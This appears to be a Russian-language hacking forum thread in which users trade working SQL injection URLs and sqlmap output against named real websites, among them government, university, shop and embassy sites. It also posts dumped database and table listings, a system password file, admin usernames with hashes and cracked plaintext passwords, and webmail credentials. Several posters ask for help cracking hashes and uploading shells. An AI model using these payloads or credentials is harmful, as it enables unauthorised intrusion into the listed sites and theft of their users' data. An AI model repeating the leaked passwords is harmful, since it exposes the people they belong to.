Payload: catId=ard' AND (SELECT * FROM (SELECT(SLEEP(5)))Jqzn) AND 'dkLD'='dkLD
---
web application technology: PHP 5.3.29
back-end DBMS: MySQL 5.0.12
Database: jewelfo9_db73544m
[32 tables]
+-------------------+
| arrival_list |
| arrival_list_lot |
| basket |
| box |
| business |
| category |
| defect |
| delivery |
| favorites |
| logistics |
| lots |
| motion |
| motion_logistics |
| motion_lot |
| order_tao |
| order_tao_comment |
| order_tao_lots |
| orders |
| partCategory |
| payment |
| privilege |
| purchase |
| recovery |
| requirement |
| role |
| role_privilege |
| store |
| store_location |
| topMenu |
| user_location |
| user_role |
| users |
+-------------------+
================================================== ================================================== =============
http://www.int.nsk.su/tech.php?id=1 union all select 1,user(),version(),4,5,database()
logosolinf_hleb 5.6.28-76.1-log logosolinf_hleb@localhost
================================================== ================================================== =============
http://www.sinoshop.ru/catalog.php?pid=1 union all select 1,2,version(),4,5,6,7,8,9
4.0.24_Debian-10sarge3-log

Code:
http://tvoy-soblazn.ru/catalog.php?cat=9&sid=120&sid=-118+UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,ver sion(),54,55,56,57,database(),59,60,61,62,63,64,65 ,66,67,68,69,70,71,72,73,74--

rentaproject_szn
5.0.82-log 7

Code:
http://www.dealigg.com/index.php?page=2&category=ApparelShoes (GET)

Parameter: category (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=2&category=ApparelShoes' AND 9810=9810 AND 'aHPZ'='aHPZ

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: page=2&category=ApparelShoes' AND (SELECT 9690 FROM(SELECT COUNT(*),CONCAT(0x716a716b71,(SELECT (ELT(9690=9690,1))),0x71706a7171,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'rueO'='rueO

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: page=2&category=ApparelShoes' OR SLEEP(5) AND 'YOBs'='YOBs

Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: page=2&category=-4553' UNION ALL SELECT CONCAT(0x716a716b71,0x786943664e5a70716c6e7a71727a 774b55506a74774f78446271567a7473597579504145484677 68,0x71706a7171)-- -
---
web application technology: PHP 5.4.16
back-end DBMS: MySQL 5.0
available databases [3]:
dealdb
information_schema
test

А то все мелочь и мелочь!

http://i.imgur.com/2RloLOJ.png

RWD (https://antichat.live/members/234579/), раскручивайте вручную.


Code:
http://www.dealigg.com/index.php?page=2&category=-ApparelShoes'+and+extractvalue(1,concat(0x3a,(user ())))+--+

Current User: root@localhost


Code:
http://www.lafinancepourtous.com/quiz/admin/xml.php?id=2 (GET)

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2 AND 2870=2870

Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: id=2 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x717a707671,(SELECT (ELT(1622=1622,1))),0x717a706a71,0x78))s), 8446744073709551610, 8446744073709551610)))

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=2 AND SLEEP(5)
---
web application technology: Apache
back-end DBMS: MySQL >= 5.5

Current DB: lafinancepourtousquiz
Data Base Found: information_schema
Data Base Found: grand_quiz
Data Base Found: lafinancepourtous
Data Base Found: lafinancepourtousgame
Data Base Found: lafinancepourtousquiz
Data Base Found: mysql
Data Base Found: performance_schema
Data Base Found: phpmyadmin
Data Base Found: portail
Data Base Found: preprod

# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $
#
root:*:0:0:Charlie &:/root:/bin/csh
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
clamav:*:106:106:Clam Antivirus:/nonexistent:/sbin/nologin
mysql:*:88:88:MySQL Daemon:/home/mysql:/usr/sbin/nologin
admin:*:1001:1001:User &:/home/admin:/bin/sh
pgsql:*:70:70:PostgreSQL Daemon:/usr/local/pgsql/pgsql:/bin/sh
spamd:*:58:58:SpamAssassin user:/var/spool/spamd:/sbin/nologin
vscan:*:110:110:Scanning Virus Account:/var/amavis:/bin/sh
dovecot:*:143:143:Dovecot User:/var/empty:/usr/sbin/nologin
cyrus:*:60:60:the cyrus mail server:/nonexistent:/usr/sbin/nologin
mailowner:*:1003:1003:User &:/home/mailowner:/usr/sbin/nologin
webapps:*:1004:1004:User &:/home/webapps:/sbin/nologin
mailman:*:91:91:Mailman Owner:/home/mailman:/sbin/nologin
nfrance:*:1006:1006:User &:/home/nfrance:/bin/sh
mrtg:*:279:1001:MRTG daemon:/nonexistent:/sbin/nologin
stats:*:1008:1009:User &:/home/stats:/sbin/nologin
nagios:*:181:181:Nagios pseudo-user:/var/spool/nagios:/sbin/nologin
dovenull:*:144:144:Dovecot login User:/var/empty:/usr/sbin/nologin
iefp2:*:1009:1010:utilisateur:/home/users/iefp2:/bin/ftponly
iefp3:*:1010:1011:utilisateur:/home/users/iefp3:/usr/local/bin/bash
mail1001:*:1011:1012:utilisateur:/home/users/mail1001:/usr/sbin/nologin
mail1005:*:1012:1013:utilisateur:/home/users/mail1005:/usr/sbin/nologin
mail1010:*:1013:1014:utilisateur:/home/users/mail1010:/usr/sbin/nologin
mail1015:*:1014:1015:utilisateur:/home/users/mail1015:/usr/sbin/nologin
mail1018:*:1016:1017:utilisateur:/home/users/mail1018:/usr/sbin/nologin
mail1020:*:1017:1018:utilisateur:/home/users/mail1020:/usr/sbin/nologin
mail1024:*:1018:1019:utilisateur:/home/users/mail1024:/usr/sbin/nologin
mail1026:*:1019:1020:utilisateur:/home/users/mail1026:/usr/sbin/nologin
mail1022:*:1020:1021:utilisateur:/home/users/mail1022:/usr/sbin/nologin
mail1029:*:1021:1022:utilisateur:/home/users/mail1029:/usr/sbin/nologin
mail1017:*:1022:1023:utilisateur:/home/users/mail1017:/usr/sbin/nologin
mail1025:*:1023:1024:utilisateur:/home/users/mail1025:/usr/sbin/nologin
mail1006:*:1024:1025:utilisateur:/home/users/mail1006:/usr/sbin/nologin
mail1003:*:1025:1026:utilisateur:/home/users/mail1003:/usr/sbin/nologin
mail1012:*:1026:1027:utilisateur:/home/users/mail1012:/usr/sbin/nologin
mail1027:*:1027:1028:utilisateur:/home/users/mail1027:/usr/sbin/nologin
mail1028:*:1028:1029:utilisateur:/home/users/mail1028:/usr/sbin/nologin
mail1002:*:1029:1030:utilisateur:/home/users/mail1002:/usr/sbin/nologin
mail1019:*:1030:1031:utilisateur:/home/users/mail1019:/usr/sbin/nologin
mail1030:*:1031:1032:utilisateur:/home/users/mail1030:/usr/sbin/nologin
mail1031:*:1032:1033:utilisateur:/home/users/mail1031:/usr/sbin/nologin
vnstat:*:284:284:vnStat Network Monitor:/nonexistent:/usr/sbin/nologin


current user: 'atame_@localhost'


Code:
http://lacuerda.net:80/Enlaces/index.php?cid=9 (GET)
Parameter: cid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cid=9 AND 7978=7978

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: cid=9 AND (SELECT 2945 FROM(SELECT COUNT(*),CONCAT(0x7162767171,(SELECT (ELT(2945=2945,1))),0x716a7a6b71,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: cid=9 AND SLEEP(5)
---
web application technology: Apache, PHP 5.4.42
back-end DBMS: MySQL >= 5.0
available databases [4]:
information_schema
lc_comunidad
lc_dbase
lc_topsites



Code:
http://www.owk.cz:80/philosophy-operation/whoweare/subject.php?id=1 (GET)
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 5266=5266

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)
---
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL >= 5.0.12

Code:
http://www.dalnoboivideo.ru/page.php?id=-118'+union+select+1,version(),3,4+--+

версия: 5.6.28-1+wheezy1+mh2-log

таблицы: adv,adv_places,pages,places,users,videos

поля users: id,login,password,city,mail,ip,date_reg,priv

админки не нашел и все что с этим связанно.((((

Code:
http://www.bogatiyhohol.ru/news.php?id=-1%27+union+select+1,@@version,3,4+--+

Code:
http://agiperwatch.ru/review.php?id=15'+union+select+1,2,group_concat(0x 3a,schema_name+SEPARATOR+0x0b),concat_ws(0x3a,vers ion(),user(),database())+from+information_schema.s chemata+--+sp

version: 5.1.49-3

user: root@localhost

database: agiperwatch

Drivers & Downloads


HTML:
http://www.drivers-download.com/en/list.php?id=46%20/*!50000union*/%20distinct%20select%201,2,version(),4,5,6,7,8,9,1 0

5.5.48-37.8

ТИЦ 10

AlexaRank 667,198

Code:
http://countryfest.ca/page.php?id=72%20OR%20(SELECT%20COUNT(*)%20FROM%20 (SELECT%201%20UNION%20SELECT%202%20UNION%20SELECT% 203)x%20GROUP%20BY%20CONCAT(MID(VERSION(),%201,%20 63),%20FLOOR(RAND(0)*2)))%20--

5.5.50-log

Телеком63 - о технологиях связи в Самаре


Code:
http://www.telecom63.ru/post.php?id=-1'+union+select+1,2,3,@@version,5,6,7,8,9,10,11+--+sp

version: 5.6.25-73.1

ТИЦ: 10

базы:

saminter_telecom63

saminter_63f

saminter_cms00

saminter_db

saminter_ekanevidal

saminter_itvist

saminter_mebeljournal

saminter_pesokbeton

saminter_samboard

saminter_wp

saminter_zavodoy


Code:
http://pksport.ru/post.php?id=-1'+union+select+1,version(),3,4,5,6,7+--+sp

version: 5.5.48-log


Code:
http://alwaystop.ru/post.php?id=-1'+union+select+1,2,concat_ws(0x3a,version()),4,5, 6,7+--+sp

version:

5.1.73-cll

Complete Education Web Portal,Learn English Language Course,Jobs,Immigration,Study Abroad,Student Visa,Universities.and much more..


Code:
http://www.123freenet.com/funnysms/sms.php?id=-3'%20union%20select%201,2,3,4,5,%28select%28select %20concat%28%40%3a%3d0xa7%2c%28select%20count%28%2 a%29from%28information_schema%2ecolumns%29where%28 %40%3a%3dconcat%28%40%2c0x3c6c693e%2ctable_name%2c 0x3a%2ccolumn_name%29%29%29%2c%40%29%29%29,7,8--+f

AR 511,358

AR country 12,642=PK (Pakistan)

5.5.44-0ubuntu0.12.04.1-log

Code:
http://www.sironieditore.it/sezioni/articolo.php?ID_libro=978-88-518-0097-0&ID_articolo=-779%27+UNION%20SELECT%201,2,load_file(%27/var/www/htdocs/sironweb/htdocs/sezioni/articolo.php%27),4,5,6,7,8,9,10,11,12,13,14,15+int o+outfile+%27/tmp/sdfgh%27--+

Code:
http://www.voshod-invest.ru/biz_show_buy.php?id=-8826+union+select+1,2,@@version,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30+--+

5.0.70-log Тиц 20

Code:
http://www.dublinsquarepub.com/news.php?id=1%20OR%20(SELECT%20COUNT(*)%20FROM%20( SELECT%201%20UNION%20SELECT%202%20UNION%20SELECT%2 03)x%20GROUP%20BY%20CONCAT(MID(VERSION(),%201,%206 3),%20FLOOR(RAND(0)*2)))%20--

5.0.96-log

roundcube SQL result:


Code:
http://mail.dp-dvk.com.ua
username: noc@dp-dvk.com.ua
pasw: noc12345

foxxat said:
↑ (https://antichat.live/posts/3997727/)
roundcube SQL result:

Code:
http://mail.dp-dvk.com.ua
username: noc@dp-dvk.com.ua
pasw: noc12345



а скуль то где?

Скулька в сервисе раздачи шмоток в Доте в запросе Insert при загрузке в имени файла, там же и залиться можно.

через error - based выглядит так

Запрос


Code:
POST /admin/addimg.php HTTP/1.1
Host: dota2h1.ru
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://dota2h1.ru/admin/upload.php
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------271871778025892
Content-Length: 402

-----------------------------271871778025892
Content-Disposition: form-data; name="filename"; filename="' or extractvalue(0x0a,concat(0x0a,(select database()),0x0a, version())) , '"
Content-Type: application/octet-stream

-----------------------------271871778025892
Content-Disposition: form-data; name="upload"

upload
-----------------------------271871778025892--

Ответ


Code:
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Sun, 16 Oct 2016 20:22:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Location: http://dota2h1.ru/admin/upload.php
Content-Length: 59

1105: XPATH syntax error: '
ideawebf_dota
5.6.27-75.0-log'

http://sanatoria.ru/san.php?org=-21...8,329,330,331,332,333,334,335,336,337,338-- + (http://sanatoria.ru/san.php?org=-21%27+UNION+SELECT+1,concat_ws(0x3a,database(),use r(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,5 0,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66, 67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83 ,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,1 00,101,102,103,104,105,106,107,108,109,110,111,112 ,113,114,115,116,117,118,119,120,121,122,123,124,1 25,126,127,128,129,130,131,132,133,134,135,136,137 ,138,139,140,141,142,143,144,145,146,147,148,149,1 50,151,152,153,154,155,156,157,158,159,160,161,162 ,163,164,165,166,167,168,169,170,171,172,173,174,1 75,176,177,178,179,180,181,182,183,184,185,186,187 ,188,189,190,191,192,193,194,195,196,197,198,199,2 00,201,202,203,204,205,206,207,208,209,210,211,212 ,213,214,215,216,217,218,219,220,221,222,223,224,2 25,226,227,228,229,230,231,232,233,234,235,236,237 ,238,239,240,241,242,243,244,245,246,247,248,249,2 50,251,252,253,254,255,256,257,258,259,260,261,262 ,263,264,265,266,267,268,269,270,271,272,273,274,2 75,276,277,278,279,280,281,282,283,284,285,286,287 ,288,289,290,291,292,293,294,295,296,297,298,299,3 00,301,302,303,304,305,306,307,308,309,310,311,312 ,313,314,315,316,317,318,319,320,321,322,323,324,3 25,326,327,328,329,330,331,332,333,334,335,336,337 ,338--%20+)

PHP:
http://www.studioslips.com/selected_model.php?ManID=89&CabID=-4731+/*!UnIoN*/+SeLecT+1111,2222,3333,4444,5555#

Так можно?

BabaDook said:
↑ (https://antichat.live/posts/4008740/)

PHP:
http://www.studioslips.com/selected_model.php?ManID=89&CabID=-4731+/*!UnIoN*/+SeLecT+1111,2222,3333,4444,5555#

Так можно?


можно так


Code:
http://www.studioslips.com/selected_model.php?ManID=89&CabID=-4731+/*!UnIoN*/+SeLecT/**/+1111,version/**/(),3333,4444,5555%23

PHP:
http://www.signsolutions.org.in/product.php?id=74'+and+false+uNiOn+SeLecT+1,2,conc at(uname,0x2020,password),4,5,6,7,8,9,10,11+from+a dmin+--+-

Если кто-то зальётся напишите

Тиц 1300, неплохой траф


Code:
http://carexpert.ru/news/2016-11-24/cn17'%20OR%20%28SELECT%20COUNT%28*%29%20FROM%20%28 SELECT%201%20UNION%20SELECT%202%20UNION%20SELECT%2 03%29x%20GROUP%20BY%20CONCAT%28MID%28VERSION%28%29 ,%201,%2063%29,%20FLOOR%28RAND%280%29*2%29%29%29+--+/

http://www.wildflower.org/plants/re...ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- xRGJ (http://www.wildflower.org/plants/result.php?id_plant=-8439%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NU LL,NULL,NULL,NULL,CONCAT(0x716b6a7171,0x6d6450454d 504b4f6e426c78434c47465a4745484e547459716b694f4842 7a7067496d506942487a,0x716b716271),NULL,NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL--%20xRGJ)

http://www.vision-control.com/en/pr...er]=1'&cHash=2c2da399e636f5def376af14d3c9b459 (http://www.vision-control.com/en/products-services/product-catalogue/product-catalogue-vision-control/?tx_vcproducts_pi1%5Bcat%5D=tx_vcproducts_class_72 )+and+1=0+union+all+select+1,null,database(),4,5,6 +--+&tx_vcproducts_pi1%5Bproductfilter%5D=1'&cHash=2c2da399e636f5def376af14d3c9b459)

http://m.semtech.com/apps/applications.php?lang=en&id=-9 union select 1,version(),3,4,5,6,7,8 (http://m.semtech.com/apps/applications.php?lang=en&id=-9%20union%20select%201,version(),3,4,5,6,7,8)


ТИЦ 120

AR 136,726

AR country 40,386=CN (China)

Code:
http://vetrb.ru/index_view.php?id=4%27+and+1=0+union+select+1,conc at_ws(0x3a,version(),database()),3+--+f

10.1.21-MariaDB:muslimov_vetrb

ТИЦ 10

Code:
http://www.rubin69.ru/news.php?id=(1)and(select+1+from(select+count(*),c oncat((select%20@@version),floor(rand(0)*2))x+from +information_schema.tables+group+by+x)a)--

5.6.33-79.0-log1 .

Code:
http://www.afghanembassyjp.org/jp/news/?an=-12+union+select+1,database(),3,4,5,6,7,8--

Code:
http://www.divorcemed.com/FAQ/divorce-mediation-faq-2.php?faq_id=-4+union+select+1,2,concat(username,0x3a,password), 4,5,6+from+users+limit+1,1--

Code:
http://www.so-toulouse.com/organiser-sa-venue/les-acteurs-par-categorie/agences/fiche-agence/acteur/pgo/-9+union+select+1,2,3,4,5,6,7,8,9,user(),11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27+--+.html#.WJR_cENMIb8

Code:
http://www.dublinsquarepub.com/news.php?id=-1+union+select+1,version(),database(),4,5,6--

Code:
http://www.drinksontario.com/memberinfo.php?id=-70+union+select+all+1,2,3,4,5,6,7,8,9,10,database( ),version(),13,14



Code:
http://bellasamui.com/koh-samui-shopping.php?id=-8+union+select+all+1,2,3,database(),version(),6



Code:
http://yggdrasilrecords.net/releases.php?id=-5+union+select+all+1,database(),version()

Code:
http://www.bestrent.fi/en/book-now.php?id=-304+union+select+all+1,2,version(),4,5,6,7,8,9,10, 11,12,13,14,database(),16,17,18,19,20,21



Code:
http://nightgallery.ca/artist.php?id=-98+union+select+all+1,version(),database(),4,5,6,7 ,8,9



Code:
http://www.nbrri.gov.ng/sites/news.php?ID=-57+union+select+all+1,2,3,4,5,6,7,8,9,10,11,12

Вот вам тайский универ


Code:
http://www.maireang.ac.th/detail.php?id=-9+union+select+1,2,3,version(),5,6,7,8--

University of Sheffield Film Unit


Code:
http://filmunit.union.shef.ac.uk/film.php?id=-392+union+select+1,2,3,4,@@version,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22--

Code:
http://www.valiani.com/manual_detail.php?ID=-5+union+select+1,2,3,concat_ws(0x3a,version(),data base()),5,6,7--

Code:
http://www.lotus-invest.ps/more-news.php?id=-7+union+select+1,2,version(),4,5,6--

P.S. Народ, вы где?

SQL http://www.giftmakers.co/product.php?id=513

Database: ftradmin

admin 93ce7e8d523ea9eaf8bab0450f1b5960

Так и не нашел админку...

http://www.sonic360.com/artist.news.inc.php?id=

admin username password

0 sonic360 dontwalkrun

0 shari tammy0516

0 Catherine sachets

1 eva brickwall

0 alex michael

0 chug telephone

0 Jennifer sahsheem

0 Kinky sonic

0 Chris tribune

0 jack arctic

0 sara sonic

0 Hana zencito1

0 Zen arctic

0 Electric Geisha dontwalkrun

у кого получится залиться - отпишитесь...

Code:
http://www.hier.iif.hu/hu/educatio_reszletes.php?id=-51+union+select+1,2,version(),4,5,6,7,8,9,10,11--

P.S. Тут выставляем только найденный и раскрученные скули!!! Хватит флудить в теме!!!

DA63


Code:
https://www.stmoritz.ch/en/st-moritz/event-calendar/details/?no_cache=1&print=1&cHash=46001ddfd00d1f1a92cc4128d684e94c&event_id=4693067+and(select+1+from(select+count(*) ,concat((select+(select+concat(usr_login_name,0x3a ,usr_password))+from+adm_users+limit+1,1),floor(ra nd(0)*2))x+from+adm_users+group+by+x)a)+and+1=1

Philippine Government

Government Procurement Policy Board


Code:
http://www.gppb.gov.ph/opinions/view_nonpolicy.php?id=-566%27+union+select+1,version(),3,4,user(),databas e()+--+

Code:
https://stat.internet.su/
Имя пользователя: ' OR 1=1 --

http://www.samotur.ru/infoitem.php?id=-2' (http://www.samotur.ru/infoitem.php?id=-2%27)

login | password |

+-------+----------------------------------+

| alla | ad8c99842233c9c92562a5f86a903de7 | aLLa201a

| burov | 5bafe1d92ecd0b0600863a24080fd4c7 | kos007

| vinos | 13fe46af14424ebb6f18bfd8521dc4f6 | samot109

| voron | 74f5f88a4166932d779f73fd0085d82e | corvux

+-------+----------------------------------+

voron 9addf7b94451563383e03ef5e602b401 MD5 : slowbeat19

не получилось зайти правда)

http://www.samotur.ru/admin

кто подскажет, в чём проблема?

http://profstud.zabgu.ru/view_actual.php?id=-1'

Administrator | f7999a0b10f3783fa848fea8fbeb6a18fa2wm8 | profstud.zabgu@mail.ru (mailto:profstud.zabgu@mail.ru) | Сергей | Воронин

есть мысли по поводу хеша?)

http://yggdrasilrecords.net/artists.php?id=-1+union+select+concat(0x3a,(user())),database(),3

Table: ygg_sys_users

[5 columns]

+-------------+---------------------+

| Column | Type |

+-------------+---------------------+

| displayname | varchar(255) |

| group_id | tinyint(3) unsigned |

| password | varchar(128) |

| user_id | tinyint(3) unsigned |

| username | varchar(64) |

+-------------+---------------------+

помогите раскрутить до конца)

Всякие форексы


Code:
http://supertrader.co.th/season3/article-detail.php?id=-1 union all select 1,version(),3,4,5,group_concat(table_name),7,8,9,1 0,11,12 from information_schema.tables where table_schema=database() --+
26 таблиц:
account
bannercategory
bannerhome
battle
gallery
gallerycategory
member
***
userlogin
websiteinfo


sptrader_season3|5.1.73|supertrad_db3@localhost




Code:
http://www.thaiforexschool.com/view-article.php?id=1'+union+all+select+group_concat(ta ble_name) from information_schema.tables where table_schema=database()+--+&name=Divergence%20Trading
28 таблиц:
admin_management
answer
article
books
categorytest
course2013
***
member
news
nt_act
nt_act1
nt_photo
nt_photo1
question
register_course
student_do_pre


thaiforex_smf|5.1.65|thaiforex@localhost




Code:
https://www.worldforexbrokers.com/wf-directory/post-detail.php?id=84' AND (select 1 from(select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 54,1),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a)b) --+
55 таблиц
0,1::wfbrokers_admin::
1,1::wfbrokers_advertisements::
2,1::wfbrokers_advertisementstypes::
3,1::wfbrokers_announcement::
4,1::wfbrokers_assignbroker::
5,1::wfbrokers_bankrates::
6,1::wfbrokers_banner::
***
54,1::wfbrokers_videos::


::worldforex_livedb::5.6.35-cll-lve::wfblivedbusr@localhost::

Ахах, полчаса делал вывод, Вот что значит нет практики


PHP:
http://www.indoramaeleme.com/media.php?id=59+u%6eion select 1,2,c%6fnc%61t(0x 223c2f7465%37%38%37%34%36%317265613e27273e3c73%36% 33%37%326970743e616c6572742822,table%5f%6e%61%6de, 0x3e3e,%63%6f%6c%75%6d%6e%5f%6e%61%6d%65,0x22293b3 c2f7363726970743e),4,5,6,7,8+%20%66%72%6f%6d%20%69 %6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%6 1%2e%63%6f%6c%75%6d%6e%73%20%77%68%65%72%65%20%54% 41%42%4c%45%5f%53%43%48%45%4d%41%3d%44%41%54%41%42 %41%53%45%28%29+--+-

чтение файлов через hex(load_file(file)) вывод естественно с кодировки, кто сделает норм вывод поделитесь


PHP:
substring(load_file('/etc/passwd'),0,1)
Вот что,открыл я доки,и по нял что на русском нету%30� � того что есть.

Abu Dhabi Cricket Club


Code:
http://www.adcricketclub.ae/news_detail.php?newsID=-123+union+select+1,concat(0x3a,user(),database()), 3,4,5,6--

Malda College, India


Code:
http://www.maldacollege.ac.in/current-news.php?id=-35+union+select+1,version(),3,database()--

Code:
view-source:http://bw-plast.com/en/news.php?id=-2+union+select+1,2,3,4,5,6,7,version(),9,10,11,12, 13,14--

5.1.73-14.12-log

Code:
http://www.severven.ru/base1/readmore.php?id=%27+union+all+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32+--+



Code:
http://www.severven.ru/base1/readmore.php?id=%27+union+all+select+1,2,3,4,5,(se lect+concat(@a,0x5B2F44554D505D)+from(select+@a:=0 x5B44554D505D,(select+@a+from+information_schema.c olumns+where+table_schema=database()+and+@a:=conca t(@a,table_name,0x09,column_name,0x0A)))a),7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28,29,30,31,32+--+


.SpoilerTarget" type="button">Spoiler: Результат


Code:
areas id
areas name
areas image
areas styles
areas text
areas keywords
areas del
areas published
articles id
articles navigation
articles parent_id
articles lft
articles rght
articles name3
articles text
articles published
articles styles
articles keywords
articles image
articles del
articles dienst
articles name
basa ID
basa name
basa titel
basa text
basa email
basa datum
basa beschreibung
basa a
basa b
basa c
basa d
basa e
basa f
basa g
basa h
basa i
basa k
bulgaria_part id
bulgaria_part name
bulgaria_part image
bulgaria_part styles
bulgaria_part text
bulgaria_part keywords
bulgaria_part del
bulgaria_part published
categories id
categories name
categories published
categories image
categories styles
categories text
categories keywords
categories del
cityobjects id
cityobjects category_id
cityobjects user_id
cityobjects area_id
cityobjects image
cityobjects address
cityobjects room
cityobjects floors
cityobjects floor
cityobjects floorspace
cityobjects totalarea
cityobjects costmetr
cityobjects totalcost
cityobjects commission
cityobjects auction
cityobjects mortgage
cityobjects column
cityobjects note
cityobjects published
cityobjects created
cityobjects modified
cityobjects vid
cityobjects del
cityobjects term
cityobjects until
cityobjects untilroom
cityobjects mainfoto
cityobjects image2
cityobjects agent
cityobjects note2
cityobjects telefon
cityobjects operator
countries id
countries name
countries image
countries styles
countries text
countries text2
countries keywords
countries del
countries published
foreignobjects id
foreignobjects foreigntype_id
foreignobjects user_id
foreignobjects country_id
foreignobjects address
foreignobjects city
foreignobjects room
foreignobjects floors
foreignobjects floor
foreignobjects totalarea
foreignobjects totalcost
foreignobjects rent
foreignobjects note
foreignobjects published
foreignobjects created
foreignobjects modified
foreignobjects del
foreignobjects image2
foreignobjects image3
foreignobjects image4
foreignobjects image5
foreignobjects until
foreignobjects untilarea
foreignobjects untilroom
foreignobjects comment
foreignobjects keywords
foreignobjects mainfoto
foreignobjects about_country
foreignobjects bulgaria_part_id
foreigntypes id
foreigntypes name
foreigntypes image
foreigntypes styles
foreigntypes text
foreigntypes keywords
foreigntypes del
foreigntypes published
groups id
groups name
groups created
groups modified
images id
images image
images foreignobject_id
posts id
posts created
posts image
posts name
posts text
posts text2
posts published
posts del
underground id
underground name
users id
users username
users password
users first_name
users last_name
users email
users phone
users group_id
users created
users modified
users admin
users image
users del
users note
users fathername
users salt
users2 id
users2 login
users2 password
users2 salt




Code:
http://www.severven.ru/base1/readmore.php?id=%27+union+all+select+1,2,3,4,5,(se lect+concat_ws(0x09,username,password,salt,admin)f rom+users+limit+0,1),7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+--+



Code:
administrator *тут был хеш* 1



Code:
http://www.severven.ru/robots.txt



PHP:

Missing Controller

Error: Robots.txtController could not be foun d.

Error: Create the class Robots.txtController below in file: app/controllers/robots.txt_controller.php



Notice: If you want to customize this error message, create app/views/errors/missing_controller.ctp

Code:
view-source:http://mstream.fr/webtv/film.php?id=-1+union+select+1,2,@,4,5,6,7,8,9,10,11+from(select +@:=0x00,(select+@+from+wp_users+where+@:=concat(@ ,user_login,0x09,user_pass,0x0a)))q

Code:
http://www.greenwall.org/recent-news.php?id=-22+union+select+1,2,version(),4,database(),6,7,8,9 ,10,11,12,13,14,15,16--

Code:
